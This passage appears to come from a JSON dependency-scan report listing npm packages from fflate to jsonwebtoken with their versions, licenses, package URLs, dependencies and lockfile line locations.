"6.5.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "picomatch@4.0.4" ], "Locations": [ { "StartLine": 9710, "EndLine": 9726 } ], "AnalyzedBy": "npm" }, { "ID": "fflate@0.8.2", "Name": "fflate", "Identifier": { "PURL": "pkg:npm/fflate@0.8.2", "UID": "262e3fbcbb6e0e65" }, "Version": "0.8.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5449, "EndLine": 5454 } ], "AnalyzedBy": "npm" }, { "ID": "fill-range@7.1.1", "Name": "fill-range", "Identifier": { "PURL": "pkg:npm/fill-range@7.1.1", "UID": "6e49be0329a123e1" }, "Version": "7.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "to-regex-range@5.0.1" ], "Locations": [ { "StartLine": 5468, "EndLine": 5479 } ], "AnalyzedBy": "npm" }, { "ID": "finalhandler@1.3.2", "Name": "finalhandler", "Identifier": { "PURL": "pkg:npm/finalhandler@1.3.2", "UID": "44378e2db020844f" }, "Version": "1.3.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "debug@2.6.9", "encodeurl@2.0.0", "escape-html@1.0.3", "on-finished@2.4.1", "parseurl@1.3.3", "statuses@2.0.2", "unpipe@1.0.0" ], "Locations": [ { "StartLine": 5480, "EndLine": 5497 } ], "AnalyzedBy": "npm" }, { "ID": "find-up@4.1.0", "Name": "find-up", "Identifier": { "PURL": "pkg:npm/find-up@4.1.0", "UID": "74277189890393b3" }, "Version": "4.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "locate-path@5.0.0", "path-exists@4.0.0" ], "Locations": [ { "StartLine": 8202, "EndLine": 8214 } ], "AnalyzedBy": "npm" }, { "ID": "firebase-admin@12.7.0", "Name": "firebase-admin", "Identifier": { "PURL": "pkg:npm/firebase-admin@12.7.0", "UID": "88dead602fe1933c" }, "Version": "12.7.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@fastify/busboy@3.2.0", "@firebase/database-compat@1.0.8", "@firebase/database-types@1.0.5", "@google-cloud/firestore@7.11.6", "@google-cloud/storage@7.19.0", "@types/node@22.19.17", "farmhash-modern@1.1.0", "jsonwebtoken@9.0.3", "jwks-rsa@3.2.2", "node-forge@1.4.0", "uuid@10.0.0" ], "Locations": [ { "StartLine": 5530, "EndLine": 5553 } ], "AnalyzedBy": "npm" }, { "ID": "follow-redirects@1.16.0", "Name": "follow-redirects", "Identifier": { "PURL": "pkg:npm/follow-redirects@1.16.0", "UID": "43b710fab4275e2b" }, "Version": "1.16.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5585, "EndLine": 5604 } ], "AnalyzedBy": "npm" }, { "ID": "fontkit@2.0.4", "Name": "fontkit", "Identifier": { "PURL": "pkg:npm/fontkit@2.0.4", "UID": "894bff46252ca494" }, "Version": "2.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@swc/helpers@0.5.21", "brotli@1.3.3", "clone@2.1.2", "dfa@1.2.0", "fast-deep-equal@3.1.3", "restructure@3.0.2", "tiny-inflate@1.0.3", "unicode-properties@1.4.1", "unicode-trie@2.0.0" ], "Locations": [ { "StartLine": 5605, "EndLine": 5621 } ], "AnalyzedBy": "npm" }, { "ID": "foreground-child@3.3.1", "Name": "foreground-child", "Identifier": { "PURL": "pkg:npm/foreground-child@3.3.1", "UID": "a2e30a30ca0114d9" }, "Version": "3.3.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "cross-spawn@7.0.6", "signal-exit@4.1.0" ], "Locations": [ { "StartLine": 5622, "EndLine": 5637 } ], "AnalyzedBy": "npm" }, { "ID": "form-data@2.5.5", "Name": "form-data", "Identifier": { "PURL": "pkg:npm/form-data@2.5.5", "UID": "c55fb148d6604a3f" }, "Version": "2.5.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "asynckit@0.4.0", "combined-stream@1.0.8", "es-set-tostringtag@2.1.0", "hasown@2.0.3", "mime-types@2.1.35", "safe-buffer@5.2.1" ], "Locations": [ { "StartLine": 5638, "EndLine": 5655 } ], "AnalyzedBy": "npm" }, { "ID": "form-data@4.0.5", "Name": "form-data", "Identifier": { "PURL": "pkg:npm/form-data@4.0.5", "UID": "a9dcd75b26c8df3d" }, "Version": "4.0.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "asynckit@0.4.0", "combined-stream@1.0.8", "es-set-tostringtag@2.1.0", "hasown@2.0.3", "mime-types@2.1.35" ], "Locations": [ { "StartLine": 3152, "EndLine": 3168 }, { "StartLine": 3579, "EndLine": 3594 }, { "StartLine": 9433, "EndLine": 9449 } ], "AnalyzedBy": "npm" }, { "ID": "forwarded@0.2.0", "Name": "forwarded", "Identifier": { "PURL": "pkg:npm/forwarded@0.2.0", "UID": "f949aeb3cd160584" }, "Version": "0.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5674, "EndLine": 5682 } ], "AnalyzedBy": "npm" }, { "ID": "fraction.js@5.3.4", "Name": "fraction.js", "Identifier": { "PURL": "pkg:npm/fraction.js@5.3.4", "UID": "262b609ca6b3437f" }, "Version": "5.3.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5683, "EndLine": 5695 } ], "AnalyzedBy": "npm" }, { "ID": "fresh@0.5.2", "Name": "fresh", "Identifier": { "PURL": "pkg:npm/fresh@0.5.2", "UID": "89a73a228e23156c" }, "Version": "0.5.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5696, "EndLine": 5704 } ], "AnalyzedBy": "npm" }, { "ID": "fsevents@2.3.3", "Name": "fsevents", "Identifier": { "PURL": "pkg:npm/fsevents@2.3.3", "UID": "85c56fb14b3953ac" }, "Version": "2.3.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5712, "EndLine": 5725 } ], "AnalyzedBy": "npm" }, { "ID": "function-bind@1.1.2", "Name": "function-bind", "Identifier": { "PURL": "pkg:npm/function-bind@1.1.2", "UID": "42b79e6545be9e79" }, "Version": "1.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5726, "EndLine": 5734 } ], "AnalyzedBy": "npm" }, { "ID": "functional-red-black-tree@1.0.1", "Name": "functional-red-black-tree", "Identifier": { "PURL": "pkg:npm/functional-red-black-tree@1.0.1", "UID": "fef055e2002924a8" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5735, "EndLine": 5741 } ], "AnalyzedBy": "npm" }, { "ID": "gaxios@6.7.1", "Name": "gaxios", "Identifier": { "PURL": "pkg:npm/gaxios@6.7.1", "UID": "2a4754ce36748a84" }, "Version": "6.7.1", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "extend@3.0.2", "https-proxy-agent@7.0.6", "is-stream@2.0.1", "node-fetch@2.7.0", "uuid@9.0.1" ], "Locations": [ { "StartLine": 5742, "EndLine": 5758 } ], "AnalyzedBy": "npm" }, { "ID": "gcp-metadata@6.1.1", "Name": "gcp-metadata", "Identifier": { "PURL": "pkg:npm/gcp-metadata@6.1.1", "UID": "5c1558c5596998da" }, "Version": "6.1.1", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "gaxios@6.7.1", "google-logging-utils@0.0.2", "json-bigint@1.0.0" ], "Locations": [ { "StartLine": 5774, "EndLine": 5788 } ], "AnalyzedBy": "npm" }, { "ID": "get-caller-file@2.0.5", "Name": "get-caller-file", "Identifier": { "PURL": "pkg:npm/get-caller-file@2.0.5", "UID": "1c9b4e765456abb8" }, "Version": "2.0.5", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5789, "EndLine": 5797 } ], "AnalyzedBy": "npm" }, { "ID": "get-intrinsic@1.3.0", "Name": "get-intrinsic", "Identifier": { "PURL": "pkg:npm/get-intrinsic@1.3.0", "UID": "de5aee2500eae497" }, "Version": "1.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "call-bind-apply-helpers@1.0.2", "es-define-property@1.0.1", "es-errors@1.3.0", "es-object-atoms@1.1.1", "function-bind@1.1.2", "get-proto@1.0.1", "gopd@1.2.0", "has-symbols@1.1.0", "hasown@2.0.3", "math-intrinsics@1.1.0" ], "Locations": [ { "StartLine": 5808, "EndLine": 5831 } ], "AnalyzedBy": "npm" }, { "ID": "get-proto@1.0.1", "Name": "get-proto", "Identifier": { "PURL": "pkg:npm/get-proto@1.0.1", "UID": "14aa4b06308a29c7" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "dunder-proto@1.0.1", "es-object-atoms@1.1.1" ], "Locations": [ { "StartLine": 5832, "EndLine": 5844 } ], "AnalyzedBy": "npm" }, { "ID": "glob@10.5.0", "Name": "glob", "Identifier": { "PURL": "pkg:npm/glob@10.5.0", "UID": "1485c123c612e565" }, "Version": "10.5.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "foreground-child@3.3.1", "jackspeak@3.4.3", "minimatch@9.0.9", "minipass@7.1.3", "package-json-from-dist@1.0.1", "path-scurry@1.11.1" ], "Locations": [ { "StartLine": 6532, "EndLine": 6552 } ], "AnalyzedBy": "npm" }, { "ID": "glob-parent@5.1.2", "Name": "glob-parent", "Identifier": { "PURL": "pkg:npm/glob-parent@5.1.2", "UID": "101c7222d656c7e2" }, "Version": "5.1.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "is-glob@4.0.3" ], "Locations": [ { "StartLine": 4017, "EndLine": 4028 }, { "StartLine": 5357, "EndLine": 5368 } ], "AnalyzedBy": "npm" }, { "ID": "glob-parent@6.0.2", "Name": "glob-parent", "Identifier": { "PURL": "pkg:npm/glob-parent@6.0.2", "UID": "9200bc84c75f2482" }, "Version": "6.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "is-glob@4.0.3" ], "Locations": [ { "StartLine": 5880, "EndLine": 5891 } ], "AnalyzedBy": "npm" }, { "ID": "google-auth-library@9.15.1", "Name": "google-auth-library", "Identifier": { "PURL": "pkg:npm/google-auth-library@9.15.1", "UID": "97cbd8eed7911f4" }, "Version": "9.15.1", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "base64-js@1.5.1", "ecdsa-sig-formatter@1.0.11", "gaxios@6.7.1", "gcp-metadata@6.1.1", "gtoken@7.1.0", "jws@4.0.1" ], "Locations": [ { "StartLine": 5908, "EndLine": 5925 } ], "AnalyzedBy": "npm" }, { "ID": "google-gax@4.6.1", "Name": "google-gax", "Identifier": { "PURL": "pkg:npm/google-gax@4.6.1", "UID": "29a182ccad883dc8" }, "Version": "4.6.1", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@grpc/grpc-js@1.14.3", "@grpc/proto-loader@0.7.15", "@types/long@4.0.2", "abort-controller@3.0.0", "duplexify@4.1.3", "google-auth-library@9.15.1", "node-fetch@2.7.0", "object-hash@3.0.0", "proto3-json-serializer@2.0.2", "protobufjs@7.5.6", "retry-request@7.0.2", "uuid@9.0.1" ], "Locations": [ { "StartLine": 5926, "EndLine": 5949 } ], "AnalyzedBy": "npm" }, { "ID": "google-logging-utils@0.0.2", "Name": "google-logging-utils", "Identifier": { "PURL": "pkg:npm/google-logging-utils@0.0.2", "UID": "da06fbf97e8a6255" }, "Version": "0.0.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5965, "EndLine": 5974 } ], "AnalyzedBy": "npm" }, { "ID": "gopd@1.2.0", "Name": "gopd", "Identifier": { "PURL": "pkg:npm/gopd@1.2.0", "UID": "afa1640946568155" }, "Version": "1.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5975, "EndLine": 5986 } ], "AnalyzedBy": "npm" }, { "ID": "graceful-fs@4.2.11", "Name": "graceful-fs", "Identifier": { "PURL": "pkg:npm/graceful-fs@4.2.11", "UID": "c744d91ea0ec3ae2" }, "Version": "4.2.11", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5987, "EndLine": 5992 } ], "AnalyzedBy": "npm" }, { "ID": "gtoken@7.1.0", "Name": "gtoken", "Identifier": { "PURL": "pkg:npm/gtoken@7.1.0", "UID": "483a9dc95cd754dd" }, "Version": "7.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "gaxios@6.7.1", "jws@4.0.1" ], "Locations": [ { "StartLine": 6000, "EndLine": 6013 } ], "AnalyzedBy": "npm" }, { "ID": "has-symbols@1.1.0", "Name": "has-symbols", "Identifier": { "PURL": "pkg:npm/has-symbols@1.1.0", "UID": "f0633add04ce3bf8" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6024, "EndLine": 6035 } ], "AnalyzedBy": "npm" }, { "ID": "has-tostringtag@1.0.2", "Name": "has-tostringtag", "Identifier": { "PURL": "pkg:npm/has-tostringtag@1.0.2", "UID": "7efc403825975bb8" }, "Version": "1.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "has-symbols@1.1.0" ], "Locations": [ { "StartLine": 6036, "EndLine": 6050 } ], "AnalyzedBy": "npm" }, { "ID": "hasown@2.0.3", "Name": "hasown", "Identifier": { "PURL": "pkg:npm/hasown@2.0.3", "UID": "9aad2c33a0510e4e" }, "Version": "2.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "function-bind@1.1.2" ], "Locations": [ { "StartLine": 6051, "EndLine": 6062 } ], "AnalyzedBy": "npm" }, { "ID": "helmet@7.2.0", "Name": "helmet", "Identifier": { "PURL": "pkg:npm/helmet@7.2.0", "UID": "dfe9b9361a06f01" }, "Version": "7.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6063, "EndLine": 6071 } ], "AnalyzedBy": "npm" }, { "ID": "hsl-to-hex@1.0.0", "Name": "hsl-to-hex", "Identifier": { "PURL": "pkg:npm/hsl-to-hex@1.0.0", "UID": "56cea08d26d06246" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "hsl-to-rgb-for-reals@1.1.1" ], "Locations": [ { "StartLine": 6072, "EndLine": 6080 } ], "AnalyzedBy": "npm" }, { "ID": "hsl-to-rgb-for-reals@1.1.1", "Name": "hsl-to-rgb-for-reals", "Identifier": { "PURL": "pkg:npm/hsl-to-rgb-for-reals@1.1.1", "UID": "f831f44e97c7b9fc" }, "Version": "1.1.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6081, "EndLine": 6086 } ], "AnalyzedBy": "npm" }, { "ID": "html-entities@2.6.0", "Name": "html-entities", "Identifier": { "PURL": "pkg:npm/html-entities@2.6.0", "UID": "c49627be72157663" }, "Version": "2.6.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6087, "EndLine": 6103 } ], "AnalyzedBy": "npm" }, { "ID": "html-to-text@9.0.5", "Name": "html-to-text", "Identifier": { "PURL": "pkg:npm/html-to-text@9.0.5", "UID": "58e92ace26d2714a" }, "Version": "9.0.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@selderee/plugin-htmlparser2@0.11.0", "deepmerge@4.3.1", "dom-serializer@2.0.0", "htmlparser2@8.0.2", "selderee@0.11.0" ], "Locations": [ { "StartLine": 6104, "EndLine": 6119 } ], "AnalyzedBy": "npm" }, { "ID": "htmlparser2@8.0.2", "Name": "htmlparser2", "Identifier": { "PURL": "pkg:npm/htmlparser2@8.0.2", "UID": "d9d36ee02c63b509" }, "Version": "8.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "domelementtype@2.3.0", "domhandler@5.0.3", "domutils@3.2.2", "entities@4.5.0" ], "Locations": [ { "StartLine": 6120, "EndLine": 6138 } ], "AnalyzedBy": "npm" }, { "ID": "http-errors@2.0.1", "Name": "http-errors", "Identifier": { "PURL": "pkg:npm/http-errors@2.0.1", "UID": "48163e8f1bb8abc6" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "depd@2.0.0", "inherits@2.0.4", "setprototypeof@1.2.0", "statuses@2.0.2", "toidentifier@1.0.1" ], "Locations": [ { "StartLine": 6139, "EndLine": 6158 } ], "AnalyzedBy": "npm" }, { "ID": "http-parser-js@0.5.10", "Name": "http-parser-js", "Identifier": { "PURL": "pkg:npm/http-parser-js@0.5.10", "UID": "2d16e6a32551842b" }, "Version": "0.5.10", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6159, "EndLine": 6164 } ], "AnalyzedBy": "npm" }, { "ID": "http-proxy-agent@5.0.0", "Name": "http-proxy-agent", "Identifier": { "PURL": "pkg:npm/http-proxy-agent@5.0.0", "UID": "a735ac4ff6b38226" }, "Version": "5.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@tootallnate/once@2.0.0", "agent-base@6.0.2", "debug@4.4.3" ], "Locations": [ { "StartLine": 6165, "EndLine": 6179 } ], "AnalyzedBy": "npm" }, { "ID": "https-proxy-agent@5.0.1", "Name": "https-proxy-agent", "Identifier": { "PURL": "pkg:npm/https-proxy-agent@5.0.1", "UID": "83c3d67d62a3fb4f" }, "Version": "5.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "agent-base@6.0.2", "debug@4.4.3" ], "Locations": [ { "StartLine": 9610, "EndLine": 9623 }, { "StartLine": 10076, "EndLine": 10088 } ], "AnalyzedBy": "npm" }, { "ID": "https-proxy-agent@7.0.6", "Name": "https-proxy-agent", "Identifier": { "PURL": "pkg:npm/https-proxy-agent@7.0.6", "UID": "79cff2666fa44b26" }, "Version": "7.0.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "agent-base@7.1.4", "debug@4.4.3" ], "Locations": [ { "StartLine": 6193, "EndLine": 6206 } ], "AnalyzedBy": "npm" }, { "ID": "hyphen@1.14.1", "Name": "hyphen", "Identifier": { "PURL": "pkg:npm/hyphen@1.14.1", "UID": "2be5a90c51564a92" }, "Version": "1.14.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6217, "EndLine": 6222 } ], "AnalyzedBy": "npm" }, { "ID": "iconv-lite@0.4.24", "Name": "iconv-lite", "Identifier": { "PURL": "pkg:npm/iconv-lite@0.4.24", "UID": "a6968b91d307f59c" }, "Version": "0.4.24", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "safer-buffer@2.1.2" ], "Locations": [ { "StartLine": 6223, "EndLine": 6234 } ], "AnalyzedBy": "npm" }, { "ID": "inherits@2.0.4", "Name": "inherits", "Identifier": { "PURL": "pkg:npm/inherits@2.0.4", "UID": "79eb7bdd9b9dfeb7" }, "Version": "2.0.4", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6284, "EndLine": 6289 } ], "AnalyzedBy": "npm" }, { "ID": "ini@1.3.8", "Name": "ini", "Identifier": { "PURL": "pkg:npm/ini@1.3.8", "UID": "f4d0fc9346dae180" }, "Version": "1.3.8", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6290, "EndLine": 6295 } ], "AnalyzedBy": "npm" }, { "ID": "internmap@2.0.3", "Name": "internmap", "Identifier": { "PURL": "pkg:npm/internmap@2.0.3", "UID": "64863a955a014671" }, "Version": "2.0.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6296, "EndLine": 6304 } ], "AnalyzedBy": "npm" }, { "ID": "ioredis@5.10.1", "Name": "ioredis", "Identifier": { "PURL": "pkg:npm/ioredis@5.10.1", "UID": "4f1f102a9d8b8018" }, "Version": "5.10.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@ioredis/commands@1.5.1", "cluster-key-slot@1.1.2", "debug@4.4.3", "denque@2.1.0", "lodash.defaults@4.2.0", "lodash.isarguments@3.1.0", "redis-errors@1.2.0", "redis-parser@3.0.0", "standard-as-callback@2.1.0" ], "Locations": [ { "StartLine": 6305, "EndLine": 6328 } ], "AnalyzedBy": "npm" }, { "ID": "ip-address@10.2.0", "Name": "ip-address", "Identifier": { "PURL": "pkg:npm/ip-address@10.2.0", "UID": "66717741f24fe827" }, "Version": "10.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6329, "EndLine": 6337 } ], "AnalyzedBy": "npm" }, { "ID": "ipaddr.js@1.9.1", "Name": "ipaddr.js", "Identifier": { "PURL": "pkg:npm/ipaddr.js@1.9.1", "UID": "779e883ef9496eee" }, "Version": "1.9.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6338, "EndLine": 6346 } ], "AnalyzedBy": "npm" }, { "ID": "is-arrayish@0.3.4", "Name": "is-arrayish", "Identifier": { "PURL": "pkg:npm/is-arrayish@0.3.4", "UID": "d9a544e0396dedad" }, "Version": "0.3.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6347, "EndLine": 6352 } ], "AnalyzedBy": "npm" }, { "ID": "is-binary-path@2.1.0", "Name": "is-binary-path", "Identifier": { "PURL": "pkg:npm/is-binary-path@2.1.0", "UID": "2c0048e8715af263" }, "Version": "2.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "binary-extensions@2.3.0" ], "Locations": [ { "StartLine": 6353, "EndLine": 6364 } ], "AnalyzedBy": "npm" }, { "ID": "is-core-module@2.16.1", "Name": "is-core-module", "Identifier": { "PURL": "pkg:npm/is-core-module@2.16.1", "UID": "13bb3357056008a1" }, "Version": "2.16.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "hasown@2.0.3" ], "Locations": [ { "StartLine": 6365, "EndLine": 6379 } ], "AnalyzedBy": "npm" }, { "ID": "is-extglob@2.1.1", "Name": "is-extglob", "Identifier": { "PURL": "pkg:npm/is-extglob@2.1.1", "UID": "5ea459587a844130" }, "Version": "2.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6380, "EndLine": 6388 } ], "AnalyzedBy": "npm" }, { "ID": "is-fullwidth-code-point@3.0.0", "Name": "is-fullwidth-code-point", "Identifier": { "PURL": "pkg:npm/is-fullwidth-code-point@3.0.0", "UID": "f0fa161d65c0141c" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6389, "EndLine": 6397 } ], "AnalyzedBy": "npm" }, { "ID": "is-glob@4.0.3", "Name": "is-glob", "Identifier": { "PURL": "pkg:npm/is-glob@4.0.3", "UID": "fde339afa12d455b" }, "Version": "4.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "is-extglob@2.1.1" ], "Locations": [ { "StartLine": 6398, "EndLine": 6409 } ], "AnalyzedBy": "npm" }, { "ID": "is-number@7.0.0", "Name": "is-number", "Identifier": { "PURL": "pkg:npm/is-number@7.0.0", "UID": "3b3c68d39f80f601" }, "Version": "7.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6410, "EndLine": 6418 } ], "AnalyzedBy": "npm" }, { "ID": "is-stream@2.0.1", "Name": "is-stream", "Identifier": { "PURL": "pkg:npm/is-stream@2.0.1", "UID": "f8444377bd647d5" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6429, "EndLine": 6441 } ], "AnalyzedBy": "npm" }, { "ID": "is-url@1.2.4", "Name": "is-url", "Identifier": { "PURL": "pkg:npm/is-url@1.2.4", "UID": "48e934f6b5ab2555" }, "Version": "1.2.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6442, "EndLine": 6447 } ], "AnalyzedBy": "npm" }, { "ID": "isarray@1.0.0", "Name": "isarray", "Identifier": { "PURL": "pkg:npm/isarray@1.0.0", "UID": "3002ab3f4988ee69" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6448, "EndLine": 6453 } ], "AnalyzedBy": "npm" }, { "ID": "isexe@2.0.0", "Name": "isexe", "Identifier": { "PURL": "pkg:npm/isexe@2.0.0", "UID": "7651873017c515d8" }, "Version": "2.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6454, "EndLine": 6459 } ], "AnalyzedBy": "npm" }, { "ID": "jackspeak@3.4.3", "Name": "jackspeak", "Identifier": { "PURL": "pkg:npm/jackspeak@3.4.3", "UID": "fc138374f1806963" }, "Version": "3.4.3", "Licenses": [ "BlueOak-1.0.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@isaacs/cliui@8.0.2", "@pkgjs/parseargs@0.11.0" ], "Locations": [ { "StartLine": 6460, "EndLine": 6474 } ], "AnalyzedBy": "npm" }, { "ID": "jay-peg@1.1.1", "Name": "jay-peg", "Identifier": { "PURL": "pkg:npm/jay-peg@1.1.1", "UID": "cf18d1fcdcee5e2d" }, "Version": "1.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "restructure@3.0.2" ], "Locations": [ { "StartLine": 6475, "EndLine": 6483 } ], "AnalyzedBy": "npm" }, { "ID": "jiti@1.21.7", "Name": "jiti", "Identifier": { "PURL": "pkg:npm/jiti@1.21.7", "UID": "1da1e31b77e9a9d8" }, "Version": "1.21.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6484, "EndLine": 6492 } ], "AnalyzedBy": "npm" }, { "ID": "jose@4.15.9", "Name": "jose", "Identifier": { "PURL": "pkg:npm/jose@4.15.9", "UID": "3a44e42c6b5759b8" }, "Version": "4.15.9", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6493, "EndLine": 6501 } ], "AnalyzedBy": "npm" }, { "ID": "js-beautify@1.15.4", "Name": "js-beautify", "Identifier": { "PURL": "pkg:npm/js-beautify@1.15.4", "UID": "bac82ea80bd4c282" }, "Version": "1.15.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "config-chain@1.1.13", "editorconfig@1.0.7", "glob@10.5.0", "js-cookie@3.0.5", "nopt@7.2.1" ], "Locations": [ { "StartLine": 6502, "EndLine": 6522 } ], "AnalyzedBy": "npm" }, { "ID": "js-cookie@3.0.5", "Name": "js-cookie", "Identifier": { "PURL": "pkg:npm/js-cookie@3.0.5", "UID": "5d41bd0ebbab8dd6" }, "Version": "3.0.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6568, "EndLine": 6576 } ], "AnalyzedBy": "npm" }, { "ID": "js-md5@0.8.3", "Name": "js-md5", "Identifier": { "PURL": "pkg:npm/js-md5@0.8.3", "UID": "2a0f2c2c29b3cfc3" }, "Version": "0.8.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6577, "EndLine": 6582 } ], "AnalyzedBy": "npm" }, { "ID": "js-tokens@4.0.0", "Name": "js-tokens", "Identifier": { "PURL": "pkg:npm/js-tokens@4.0.0", "UID": "58659241903bf6fb" }, "Version": "4.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6583, "EndLine": 6588 } ], "AnalyzedBy": "npm" }, { "ID": "json-bigint@1.0.0", "Name": "json-bigint", "Identifier": { "PURL": "pkg:npm/json-bigint@1.0.0", "UID": "1aaee1f907200ba9" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "bignumber.js@9.3.1" ], "Locations": [ { "StartLine": 6602, "EndLine": 6611 } ], "AnalyzedBy": "npm" }, { "ID": "jsonwebtoken@9.0.3", "Name": "jsonwebtoken", "Identifier": { "PURL": "pkg:npm/jsonwebtoken@9.0.3", "UID": "44724b2e3b20bc14" }, "Version": "9.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "jws@4.0.1", "lodash.includes@4.3.0", "lodash.isboolean@3.0.3", "lodash.isinteger@4.0.4", "lodash.isnumber@3.0.3", "lodash.isplainobject@4.0.6", 